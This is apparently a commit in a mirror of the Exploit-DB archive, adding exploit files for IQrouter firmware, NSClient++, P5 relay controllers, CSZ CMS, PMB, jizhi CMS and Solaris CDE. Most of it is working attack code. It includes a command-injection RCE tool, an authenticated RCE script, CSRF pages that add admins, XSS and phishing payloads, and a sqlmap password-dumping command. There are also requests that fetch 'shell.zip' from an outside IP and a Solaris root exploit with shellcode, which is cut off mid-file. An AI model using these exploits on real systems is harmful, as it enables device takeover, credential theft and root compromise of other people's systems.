bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2020-04-22

Browse source 
10 changes to exploits/shellcodes

Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation

WordPress 2.0.2 - 'cache' Remote Shell Injection
Neowise CarbonFTP 1.4 - Insecure Proprietary Password Encryption
WordPress Core 2.0.2 - 'cache' Remote Shell Injection
CSZ CMS 1.2.7 - Persistent Cross-Site Scripting
PMB 5.6 - 'logid' SQL Injection
CSZ CMS 1.2.7 - 'title' HTML Injection
IQrouter 3.3.1 Firmware - Remote Code Execution
NSClient++ 0.5.2.35 - Authenticated Remote Code Execution
jizhi CMS 1.6.7 - Arbitrary File Download
P5 FNIP-8x16A FNIP-4xSH 1.0.20 - Cross-Site Request Forgery (Add Admin)

Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes)
This commit is contained in:
Offensive Security 2020-04-22 05:01:47 +00:00
parent 01900f216d
commit 1c5c38825d
12 changed files with 1626 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

339
exploits/hardware/webapps/48358.py Executable file
View file

@ -0,0 +1,339 @@
# Exploit Title: IQrouter 3.3.1 Firmware - Remote Code Execution
# Date: 2020-04-21
# Exploit Author: drakylar
# Vendor Homepage: https://evenroute.com/
# Software Link: https://evenroute.com/iqrouter
# Version: IQrouter firmware up to 3.3.1
# Tested on: IQrouter firmware 3.3.1
# CVE : N/A
#!/usr/bin/env python3
import argparse
from sys import argv, exit
try:
import requests
except ImportError:
print("Install requests lib! pip3 install requests")
print("""
#######################################################################
# IQrouter multiple RCE and other vulnerabilities #
# by drakylar (Shaposhnikov Ilya) #
# CVE-2020-11963 CVE-2020-11964 CVE-2020-11966 #
# CVE-2020-11967 CVE-2020-11968 #
#######################################################################
""")
rce_setup = [
[
"/cgi-bin/luci/er/vlanTag?vlan_tag='`{}`'",
"RCE /vlanTag (vlan_tag param)"
],
[
"/cgi-bin/luci/er/verify_wifi?wifi_conflict='`{}`'",
"RCE /verify_wifi (wifi_conflict param). Need hide_wifi_config != true"
],
[
"/cgi-bin/luci/er/screen9?save_creds=1&s1&s2='`{}`'&p1&p2",
"RCE /screen9 (s2 param)"
],
[
"/cgi-bin/luci/er/screen9?save_creds=1&s1='`{}`'&s2&p1&p2",
"RCE /screen9 (s1 param)"
],
[
"/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1&p2='`{}`'",
"RCE /screen9 (p2 param)"
],
[
"/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1='`{}`'&p2",
"RCE /screen9 (p1 param)"
],
[
"/cgi-bin/luci/er/screen4?save_isp='`{}`",
"RCE /screen4 (save_isp param)"
],
[
"/cgi-bin/luci/er/screen2?set_wan_modem_interfaces='`{}`'",
"RCE /screen2 set_wan_modem_interfaces param)"
],
[
"/cgi-bin/luci/er/screen2?find_ip_address_conflict='`{}`'",
"RCE /screen2 find_ip_address_conflict param)"
],
[
"/cgi-bin/luci/er/screen10?set_security_question='`{}`'",
"RCE /screen10 (set_security_question param)"
],
[
"/cgi-bin/luci/er/screen10?set_security_answer='`{}`'&set_security_question=1",
"RCE /screen10 (set_security_answer param)"],
[
"/cgi-bin/luci/er/screen1?zonename='`{}`'",
"RCE /screen1 (zonename param)"
],
[
"/cgi-bin/luci/er/register?email=`{}`",
"RCE /register (email param, result in /cgi-bin/luci/er/get_syslog for result)"
]
]
rce_any = [
[
"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2='`{}`'&p1=1&p2=1",
"RCE /wifi (s2 param)"
],
[
"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1='`{}`'&s2=5&p1=6&p2=7",
"RCE /wifi (s1 param)"
],
[
"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2=2&p1=3&p2='`{}`'",
"RCE /wifi (p2 param)"
],
[
"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2=2&p1='`{}`'&p2=4",
"RCE /wifi (p1 param)"
],
[
"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=`{}`&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7",
"RCE /wifi (guestwifi_5g_ssid param)"
],
[
"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=`{}`&guestwifi_5g_ssid=3&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7",
"RCE /wifi (guestwifi_2g_ssid param)"
],
[
"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key='`{}`'&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=2&guestwifi_5g_ssid=3&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7",
"RCE /wifi (guest_key param)"
],
[
"/cgi-bin/luci/er/wifi?enable_guestwifi='`{}`'&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=5&s2=6&p1=6&p2=7",
"RCE /wifi (enable_guestwifi param)"
],
[
"/cgi-bin/luci/er/screen11.1?email=`{}`&register=123&uilog=123&bg=123",
"RCE /screen11.1 (email param)"
],
[
"/cgi-bin/luci/er/reboot_link?link='`{}`'",
"RCE /reboot_link (link param)"
],
[
"/cgi-bin/luci/er/diag_wifi/1/2/3/4/5/'`{}`'/",
"RCE /diag_wifi (htm5ghz param)"
],
[
"/cgi-bin/luci/er/diag_wifi/1/2/3/4/'`{}`'/6/",
"RCE /diag_wifi (htm2ghz param)"
],
[
"/cgi-bin/luci/er/diag_wifi/1/2/3/'`{}`'/5/6/",
"RCE /diag_wifi (c5ghz param)"
],
[
"/cgi-bin/luci/er/diag_wifi/1/2/'`{}`'/4/5/6/",
"RCE /diag_wifi (c2ghz param)"
],
[
"/cgi-bin/luci/er/diag_set_static_wan/'`{}`'/2/3/4/",
"RCE /diag_set_static_wan (static_ip param)"
],
[
"/cgi-bin/luci/er/diag_set_static_wan/1/'`{}`'/3/4/",
"RCE /diag_set_static_wan (net_mask param)"
],
[
"/cgi-bin/luci/er/diag_set_static_wan/1/2/'`{}`'/4/",
"RCE /diag_set_static_wan (gateway param)"
],
[
"/cgi-bin/luci/er/diag_set_static_wan/1/2/3/'`{}`'/",
"RCE /diag_set_static_wan (dns param)"
],
[
"/cgi-bin/luci/er/diag_set_static_modem/'`{}`'/2/3/",
"RCE /diag_set_static_modem (static_ip param)"
],
[
"/cgi-bin/luci/er/diag_set_static_modem/1/'`{}`'/3/",
"RCE /diag_set_static_modem (net_mask param)"
],
[
"/cgi-bin/luci/er/diag_set_static_modem/1/2/'`{}`'/",
"RCE /diag_set_static_modem (gateway param)"
],
[
"/cgi-bin/luci/er/diag_set_device_name_and_sync/'`{}`'/",
"RCE /diag_set_device_name_and_sync (device_name param)"
],
[
"/cgi-bin/luci/er/diag_set_device_name/'`{}`'/",
"RCE /diag_set_device_name (device_name param)"
],
[
"/cgi-bin/luci/er/diag_pppoe_update/'`{}`'/passs/",
"RCE /diag_pppoe_update (wan_username param)"
],
[
"/cgi-bin/luci/er/diag_pppoe_update/aaadmin/'`{}`'/",
"RCE /diag_pppoe_update (wan_password param)"
],
[
"/cgi-bin/luci/er/diag_pppoe/'`{}`'/passsswd/",
"RCE /diag_pppoe (wan_username param)"
],
[
"/cgi-bin/luci/er/diag_pppoe/aaadmin/'`{}`'/",
"RCE /diag_pppoe (wan_password param)"
],
[
"/cgi-bin/luci/er/diag_pppoa_update/'`{}`'/paaaasword/",
"RCE /diag_pppoa_update (wan_username param)"
],
[
"/cgi-bin/luci/er/diag_pppoa_update/aaadmin/'`{}`'/",
"RCE /diag_pppoa_update (wan_password param)"
],
[
"/cgi-bin/luci/er/diag_pppoa/'`{}`'/passs/",
"RCE /diag_pppoa (wan_username param)"
],
[
"/cgi-bin/luci/er/diag_pppoa/aaadmin/'`{}`'/",
"RCE /diag_pppoa (wan_password param)"
],
[
"/cgi-bin/luci/er/advanced_link?link='`{}`'",
"RCE /advanced_link (link param)"
]
]
advanced_payloads = [
[
"/cgi-bin/luci/er/reboot_link?reboot=1",
"Reboot IQrouter (/reboot_link reboot param))"
],
[
"/cgi-bin/luci/er/screen2?reboot=1",
"Reboot IQrouter (/screen2 reboot param))"
],
[
"/cgi-bin/luci/er/index?reset_config=1",
"Reset IQrouter (/index reset_config param)"
],
[
"/cgi-bin/luci/er/screen7?upgrade=1",
"Upgrade IQrouter (/screen7 upgrade param)"
],
[
"/cgi-bin/luci/er/vlanTag?restart_network=1",
"Restart network (/vlanTag restart_network param)"
],
[
"/cgi-bin/luci/er/diag_iperf_cmd/start",
"Start iperf script (/diag_iperf_cmd/start)"
],
[
"/cgi-bin/luci/er/diag_iperf_cmd/stop",
"Stop iperf script (/diag_iperf_cmd/stop)"
],
[
"/cgi-bin/luci/er/get_syslog",
"Router setup info log (/get_syslog)"
],
[
"/cgi-bin/luci/er/diag_set_password/c00lpasswd/",
"Change root password to c00lpasswd (can change in code)"
],
[
"/cgi-bin/luci/er/reset_password/",
"Change root password to 'changeme' (static)"
]
]
def print_payloads():
print('#' * 30)
print("Payloads list")
num = 1
print('######################### RCE without auth ########################')
for payload in rce_any:
print("{} - {}".format(num, payload[1]))
num += 1
print(
'############### RCE (router need to be in setup mode) ###############')
for payload in rce_setup:
print("{} - {}".format(num, payload[1]))
num += 1
print(
'######################### Advanced payloads #########################')
for payload in advanced_payloads:
print("{} - {}".format(num, payload[1]))
num += 1
parser = argparse.ArgumentParser(description="IQrouter multiple RCE")
parser.add_argument('--host', help='Host', type=str)
parser.add_argument('-p', '--port', help='Web port (default: 80)', default=80, type=int)
parser.add_argument('-n', '--num', help='Payload number',
default=0, type=int)
parser.add_argument('-c', '--cmd', help='Command to execute (default: pwd)',
default="pwd", type=str)
parser.add_argument('--protocol', help='Protocol (http/https)',
default="http", type=str)
args = parser.parse_args()
def main():
print("")
full_payload_list = rce_setup + rce_any + advanced_payloads
payloads_amount = len(full_payload_list)
try:
hostname = args.host
port = args.port
payload_num = int(args.num)
bash_cmd = args.cmd
protocol = args.protocol
if payload_num < 1 or payload_num > payloads_amount:
print("Error with payload number!")
raise IndexError
if port < 0 or port > 65535:
print("Error with port number")
raise IndexError
if protocol not in ['http', 'https']:
print("Error with protocol name")
raise IndexError
current_payload = full_payload_list[payload_num - 1]
print("Payload: {}".format(current_payload[1]))
print("Host: {}".format(hostname))
print("Port: {}".format(port))
print("Protocol: {}".format(protocol))
print("Command: {}".format(bash_cmd))
full_url = "{}://{}:{}{}".format(protocol, hostname, port,
current_payload[0].format(bash_cmd))
print("Built URL: {}".format(full_url))
r = requests.get(full_url)
print("Status code: {}".format(r.status_code))
return
except IndexError:
parser.print_help()
print_payloads()
exit(1)
if __name__ == '__main__':
print(
"\n\nWarning: use TABS(doesn't work in some payloads) or ${IFS} for space.")
exit(main())

90
exploits/hardware/webapps/48362.txt Normal file
View file

@ -0,0 +1,90 @@
# Exploit Title: P5 FNIP-8x16A FNIP-4xSH 1.0.20 - Cross-Site Request Forgery (Add Admin)
# Google Dork:jizhicms
# Date: 2020-04-18
# Exploit Author: iej1ctk1g
# Product web page: https://www.p5.hu
# Affected version: 1.0.20, 1.0.11
# CVE : N/A
<!--
P5 FNIP-8x16A/FNIP-4xSH CSRF Stored Cross-Site Scripting
Vendor: P5
Product web page: https://www.p5.hu
Affected version: 1.0.20, 1.0.11
Summary: The FNIP-8x16A is an eight channel relay module used for switching any
type of load that doesnt exceed the specifications. Via its built-in web site
and TCP/IP communication, the outputs and inputs can be controlled and monitored
from standard network capable devices such as computers, smartphones, web-tablets,
etc. either locally or via the network. The module can be used independently or
as part of a complex control system in residential and commercial installations.
Desc: The controller suffers from CSRF and XSS vulnerabilities. The application
allows users to perform certain actions via HTTP requests without performing any
validity checks to verify the requests. This can be exploited to perform certain
actions with administrative privileges if a logged-in user visits a malicious web
site. Input passed to several GET/POST parameters is not properly sanitised before
being returned to the user. This can be exploited to execute arbitrary HTML and
script code in a user's browser session in context of an affected site.
Tested on: Linux
CGI
Vulnerabiity discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2020-5564
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5564.php
29.01.2020
-->
<!-- CSRF add admin user -->
<html>
<body>
<form action="http://192.168.1.17:83/user.cgi" method="POST">
<input type="hidden" name="uno" value="1" /> <!-- User number (user1) -->
<input type="hidden" name="un" value="testingus" /> <!-- Username -->
<input type="hidden" name="role" value="2" /> <!-- 2: Admin, 1: Actor, 0: Observer -->
<input type="hidden" name="enabled" value="1" />
<input type="hidden" name="pw" value="123456" />
<input type="hidden" name="pw2" value="123456" />
<input type="submit" value="Zubmit" />
</form>
</body>
</html>
<!-- CSRF change admin password -->
<html>
<body>
<form action="http://192.168.1.17:83/user.cgi" method="POST">
<input type="hidden" name="un" value="admin" /> <!-- Defaults: admin:futurenow -->
<input type="hidden" name="pw" value="123456" />
<input type="hidden" name="pw2" value="123456" />
<input type="submit" value="Zubmit" />
</form>
</body>
</html>
<!-- XSS modify labels -->
<html>
<body>
<form action="http://192.168.1.17:83/config.html" method="POST">
<input type="hidden" name="lab1" value="Channel1" />
<input type="hidden" name="lab2" value="Channel2" />
<input type="hidden" name="lab3" value="Channel3" />
<input type="hidden" name="lab4" value='"><script>confirm(251)</script>' />
<input type="hidden" name="lab12" value="etc." />
<input type="submit" value="Zubmit" />
</form>
</body>
</html>

192
exploits/json/webapps/48360.txt Normal file
View file

@ -0,0 +1,192 @@
# Exploit Title: NSClient++ 0.5.2.35 - Authenticated Remote Code Execution
# Google Dork: N/A
# Date: 2020-04-20
# Exploit Author: kindredsec
# Vendor Homepage: https://nsclient.org/
# Software Link: https://nsclient.org/download/
# Version: 0.5.2.35
# Tested on: Microsoft Windows 10 Pro (x64)
# CVE: N/A
#
# NSClient++ is a monitoring agent that has the option to run external scripts.
# This feature can allow an attacker, given they have credentials, the ability to execute
# arbitrary code via the NSClient++ web application. Since it runs as NT Authority/System bt
# Default, this leads to privileged code execution.
#!/usr/bin/env python3
import requests
from bs4 import BeautifulSoup as bs
import urllib3
import json
import sys
import random
import string
import time
import argparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def generateName():
letters = string.ascii_lowercase + string.ascii_uppercase
return ''.join(random.choice(letters) for i in range(random.randint(8,13)))
def printStatus(message, msg_type):
C_YELLOW = '\033[1;33m'
C_RESET = '\033[0m'
C_GREEN = '\033[1;32m'
C_RED = '\033[1;31m'
if msg_type == "good":
green_plus = C_GREEN + "[+]" + C_RESET
string = green_plus + " " + message
elif msg_type == "info":
yellow_ex = C_YELLOW + "[!]" + C_RESET
string = yellow_ex + " " + message
elif msg_type == "bad":
red_minus = C_RED + "[-]" + C_RESET
string = red_minus + " " + message
print(string)
# This function adds a new external script containing the desired
# command, then saves the configuration
def configurePayload(session, cmd, key):
printStatus("Configuring Script with Specified Payload . . .", "info")
endpoint = "/settings/query.json"
node = { "path" : "/settings/external scripts/scripts",
"key" : key }
value = { "string_data" : cmd }
update = { "node" : node , "value" : value }
payload = [ { "plugin_id" : "1234",
"update" : update } ]
json_data = { "type" : "SettingsRequestMessage", "payload" : payload }
out = session.post(url = base_url + endpoint, json=json_data, verify=False)
if "STATUS_OK" not in str(out.content):
printStatus("Error configuring payload. Hit error at: " + endpoint, "bad")
sys.exit(1)
printStatus("Added External Script (name: " + key + ")", "good")
time.sleep(3)
printStatus("Saving Configuration . . .", "info")
header = { "version" : "1" }
payload = [ { "plugin_id" : "1234", "control" : { "command" : "SAVE" }} ]
json_data = { "header" : header, "type" : "SettingsRequestMessage", "payload" : payload }
session.post(url = base_url + endpoint, json=json_data, verify=False)
# Since the application needs to be restarted after making changes,
# this function reloads the application, and waits for it to come back.
def reloadConfig(session):
printStatus("Reloading Application . . .", "info")
endpoint = "/core/reload"
session.get(url = base_url + endpoint, verify=False)
# Wait until the application successfully reloads by making a request
# every 10 seconds until it responds.
printStatus("Waiting for Application to reload . . .", "info")
time.sleep(10)
response = False
count = 0
while not response:
try:
out = session.get(url = base_url, verify=False, timeout=10)
if len(out.content) > 0:
response = True
except:
count += 1
if count > 10:
printStatus("Application failed to reload. Nice DoS exploit! /s", "bad")
sys.exit(1)
else:
continue
# This function makes the call to the new external script to
# ultimately execute the code.
def triggerPayload(session, key):
printStatus("Triggering payload, should execute shortly . . .", "info")
endpoint = "/query/" + key
try:
session.get(url = base_url + endpoint, verify=False, timeout=10)
except requests.exceptions.ReadTimeout:
printStatus("Timeout exceeded. Assuming your payload executed . . .", "info")
sys.exit(0)
# Before setting up the exploit, this function makes sure the
# required feature (External Scripts) is enabled on the application.
def enableFeature(session):
printStatus("Enabling External Scripts Module . . .", "info")
endpoint = "/registry/control/module/load"
params = { "name" : "CheckExternalScripts" }
out = session.get(url = base_url + endpoint, params=params, verify=False)
if "STATUS_OK" not in str(out.content):
printStatus("Error enabling required feature. Hit error at: " + endpoint, "bad")
sys.exit(1)
# This function obtains an authentication token that gets added to all
# remaining headers.
def getAuthToken(session):
printStatus("Obtaining Authentication Token . . .", "info")
endpoint = "/auth/token"
params = { "password" : password }
auth = session.get(url = base_url + endpoint, params=params, verify=False)
if "auth token" in str(auth.content):
j = json.loads(auth.content)
authToken = j["auth token"]
printStatus("Got auth token: " + authToken, "good")
return authToken
else:
printStatus("Error obtaining auth token, is your password correct? Hit error at: " + endpoint, "bad")
sys.exit(1)
parser = argparse.ArgumentParser("NSClient++ 0.5.2.35 Authenticated RCE")
parser.add_argument('-t', nargs='?', metavar='target', help='Target IP Address.')
parser.add_argument('-P', nargs='?', metavar='port', help='Target Port.')
parser.add_argument('-p', nargs='?', metavar='password', help='NSClient++ Administrative Password.')
parser.add_argument('-c', nargs='?', metavar='command', help='Command to execute on target')
args = parser.parse_args()
if len(sys.argv) < 4:
parser.print_help()
sys.exit(1)
# Build base URL, grab needed arguments
base_url = "https://" + args.t + ":" + args.P
printStatus("Targeting base URL " + base_url, "info")
password = args.p
cmd = args.c
# Get first auth token, and add it to headers of session
s = requests.session()
token = getAuthToken(s)
s.headers.update({ "TOKEN" : token})
# Generate a random name, enable the feature, add the payload,
# then reload.
randKey = generateName()
enableFeature(s)
configurePayload(s, cmd, randKey)
reloadConfig(s)
# Since application was reloaded, need a new auth token.
token = getAuthToken(s)
s.headers.update({ "TOKEN" : token})
# Execute our code.
triggerPayload(s, randKey)

32
exploits/php/webapps/48354.txt Normal file
View file

@ -0,0 +1,32 @@
# Exploit Title: CSZ CMS 1.2.7 - Persistent Cross-Site Scripting
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://sourceforge.net/projects/cszcms/
# Version: v1.2.7
# Description:
# Unauthorized user that has access private message can embed Javascript
# code to admin panel.
# Steps to reproduce:
1- Log in to member panel.
1- Change user-agent header as <script>alert(1)</script>
2- Send the private message to admin user.
3- When admin user logs in to Backend System Dashboard, an alert box pops
up on screen.
PoC Request:
POST /CSZCMS-V1.2.7/member/insertpm/ HTTP/1.1
Host: localhost
User-Agent: <script>alert(1)</script>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/CSZCMS-V1.2.7/member/newpm
Content-Type: application/x-www-form-urlencoded
Content-Length: 152
Cookie: cszcookie
Connection: close
Upgrade-Insecure-Requests: 1
csrf_csz=*&csrf_csz=*&to%5B%5D=1&title=user-agent&message=user-agent&submit=Send

43
exploits/php/webapps/48356.txt Normal file
View file

@ -0,0 +1,43 @@
# Exploit Title: PMB 5.6 - 'logid' SQL Injection
# Google Dork: inurl:opac_css
# Date: 2020-04-20
# Exploit Author: 41-trk (Tarik Bakir)
# Vendor Homepage: http://www.sigb.net
# Software Link: http://forge.sigb.net/redmine/projects/pmb/files
# Affected versions : <= 5.6
-==== Software Description ====-
PMB is a completely free ILS (Integrated Library management System). The domain of software for libraries is almost exclusively occupied by proprietary products.
We are some librarians, users and developers deploring this state of affairs.
PMB is based on web technology. This is what we sometimes call a 'web-app'.
PMB requires an HTTP server (such as Apache, but this is not an obligation), the MySQL database and the PHP language.
The main functions of PMB are :
* Supporting the UNIMARC format
* Authorities management (authors, publishers, series, subjects...)
* Management of loans, holds, borrowers...
* A user-friendly configuration
* The ability to import full bibliographic records
* A user-friendly OPAC integrating a browser
* Loans management with a module designed to serve even the very small establishments
* Serials management
* Simple administration procedures that can be handled easily even by the library staff...
-==== Vulnerability ====-
Variable $logid isn't properly sanitized in file /admin/sauvegarde/download.php, which allows ADMINISTRATION_AUTH to execute arbitrary SQL commands via the id parameter.
-==== POC ====-
http://localhost/[PMB_PATH]/admin/sauvegarde/download.php?logid=1 [SQLI]
Using SQLMAP :
./sqlmap.py -u "http://localhost/[PMB_PATH]/admin/sauvegarde/download.php?logid=1" -p logid --headers="Cookie: [VALID_USER_COOKIE]" --passwords
-==== Exploit requirements ====-
- You will need to be logged in in order to exploit the vulnerability.

27
exploits/php/webapps/48357.txt Normal file
View file

@ -0,0 +1,27 @@
# Exploit Title: CSZ CMS 1.2.7 - 'title' HTML Injection
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://sourceforge.net/projects/cszcms/
# Version: v1.2.7
# Description:
# Authenticated user can inject hyperlink to Backend System Dashboard and
# Member Dashboard via message.
PoC Request:
POST /CSZCMS-V1.2.7/member/insertpm/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/CSZCMS-V1.2.7/member/newpm
Content-Type: application/x-www-form-urlencoded
Content-Length: 196
Cookie: cszcookie
Connection: close
Upgrade-Insecure-Requests: 1
csrf_csz=*&csrf_csz=*&to%5B%5D=1&title=<h1><b><a href="http://changeme/">Please
click to view</a></b></h1>&message=phishing&submit=Send

46
exploits/php/webapps/48361.txt Normal file
View file

@ -0,0 +1,46 @@
# Exploit Title: jizhi CMS 1.6.7 - Arbitrary File Download
# Google Dork: jizhicms
# Date: 2020-04-18
# Exploit Author: iej1ctk1g
# Vendor Homepage: https://www.jizhicms.cn/
# Software Link: http://down.jizhicms.cn/jizhicms_Beta1.6.7.zip
# Version: 1.6.7
# Tested on Mac OS
# CVE : N/A
Data 1.
POST /admin.php/Plugins/update.html HTTP/1.1
Host: 192.168.1.253:8888
Content-Length: 86
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.253:8888
Referer: http://192.168.1.253:8888/admin.php/Plugins/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=32db2410f5d69bf21ba9b21ab8093a09
Connection: close
action=start-download&filepath=shell&download_url=http://39.105.143.130:9090/shell.zip
Data 2.
POST /admin.php/Plugins/update.html HTTP/1.1
Host: 192.168.1.253:8888
Content-Length: 32
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.253:8888
Referer: http://192.168.1.253:8888/admin.php/Plugins/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=32db2410f5d69bf21ba9b21ab8093a09
Connection: close
action=file-upzip&filepath=shell

320
exploits/solaris/local/48359.c Normal file
View file

@ -0,0 +1,320 @@
# Title: Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation
# Date: 2020-04-21
# Author: Marco Ivaldi
# Vendor: www.oracle.com
# CVE: CVE-2020-2944
/*
* raptor_sdtcm_conv.c - CDE sdtcm_convert LPE for Solaris/Intel
* Copyright (c) 2019-2020 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* A buffer overflow in the _SanityCheck() function in the Common Desktop
* Environment version distributed with Oracle Solaris 10 1/13 (Update 11) and
* earlier allows local users to gain root privileges via a long calendar name
* or calendar owner passed to sdtcm_convert in a malicious calendar file
* (CVE-2020-2944).
*
* The open source version of CDE (based on the CDE 2.x codebase) is not
* affected, because it does not ship the vulnerable binary.
*
* "CDE, the gift that keeps on giving" -- @0xdea
* "Feels more like a curse you can't break from this side." -- @alanc
*
* This exploit uses the ret-into-ld.so technique to bypass the non-exec stack
* protection. In case troubles arise with NULL-bytes inside the ld.so.1 memory
* space, try returning to sprintf() instead of strcpy().
*
* I haven't written a Solaris/SPARC version because I don't have a SPARC box
* on which Solaris 10 can run. If anybody is kind enough to give me access to
* such a box, I'd be happy to port my exploit to Solaris/SPARC as well.
*
* Usage:
* $ gcc raptor_sdtcm_conv.c -o raptor_sdtcm_conv -Wall
* $ ./raptor_sdtcm_conv
* [...]
* Do you want to correct it? (Y/N) [Y] n
* # id
* uid=0(root) gid=1(other) egid=12(daemon)
* #
*
* This should work with any common configuration on the first try. To
* re-enable rpc.cmsd, clear its service maintenance status by running the
* following commands as root:
* # /usr/sbin/svcadm clear cde-calendar-manager
* # /usr/bin/svcs -a | grep calendar
* online 13:16:54 svc:/network/rpc/cde-calendar-manager:default
*
* Tested on:
* SunOS 5.10 Generic_147148-26 i86pc i386 i86pc (Solaris 10 1/13)
* [previous Solaris versions are also likely vulnerable]
*/
#include <fcntl.h>
#include <link.h>
#include <procfs.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/systeminfo.h>
#include <sys/types.h>
#define INFO1 "raptor_sdtcm_conv.c - CDE sdtcm_convert LPE for Solaris/Intel"
#define INFO2 "Copyright (c) 2019-2020 Marco Ivaldi <raptor@0xdeadbeef.info>"
#define VULN "/usr/dt/bin/sdtcm_convert" // the vulnerable program
#define ADMIN "/usr/dt/bin/sdtcm_admin" // calendar admin utility
#define BUFSIZE 2304 // size of the name/owner
#define PAYSIZE 1024 // size of the payload
#define OFFSET env_len / 2 // offset to the shellcode
char sc[] = /* Solaris/x86 shellcode (8 + 8 + 27 = 43 bytes) */
/* double setuid() */
"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
/* execve() */
"\x31\xc0\x50\x68/ksh\x68/bin"
"\x89\xe3\x50\x53\x89\xe2\x50"
"\x52\x53\xb0\x3b\x50\xcd\x91";
/* globals */
char *env[256];
int env_pos = 0, env_len = 0;
/* prototypes */
int add_env(char *string);
void check_zero(int addr, char *pattern);
int search_ldso(char *sym);
int search_rwx_mem(void);
void set_val(char *buf, int pos, int val);
/*
* main()
*/
int main(int argc, char **argv)
{
char buf[BUFSIZE], payload[PAYSIZE];
char platform[256], release[256], hostname[256];
int i, payaddr;
char *arg[3] = {"foo", "hax0r", NULL};
int sb = ((int)argv[0] | 0xfff); /* stack base */
int ret = search_ldso("strcpy"); /* or sprintf */
int rwx_mem = search_rwx_mem(); /* rwx memory */
char cmd[1024];
FILE *fp;
/* print exploit information */
fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
/* read command line */
if (argc != 1) {
fprintf(stderr, "Usage:\n%s\n[...]\n", argv[0]);
fprintf(stderr, "Do you want to correct it? (Y/N) [Y] n\n\n");
exit(1);
}
/* get system information */
sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
sysinfo(SI_RELEASE, release, sizeof(release) - 1);
sysinfo(SI_HOSTNAME, hostname, sizeof(release) - 1);
/* prepare the payload (NOPs suck, but I'm too old for VOODOO stuff) */
memset(payload, '\x90', PAYSIZE);
payload[PAYSIZE - 1] = 0x0;
memcpy(&payload[PAYSIZE - sizeof(sc)], sc, sizeof(sc));
/* fill the envp, keeping padding */
add_env(payload);
add_env("HOME=/tmp");
add_env(NULL);
/* calculate the payload address */
payaddr = sb - OFFSET;
/* prepare the evil palette name */
memset(buf, 'A', sizeof(buf));
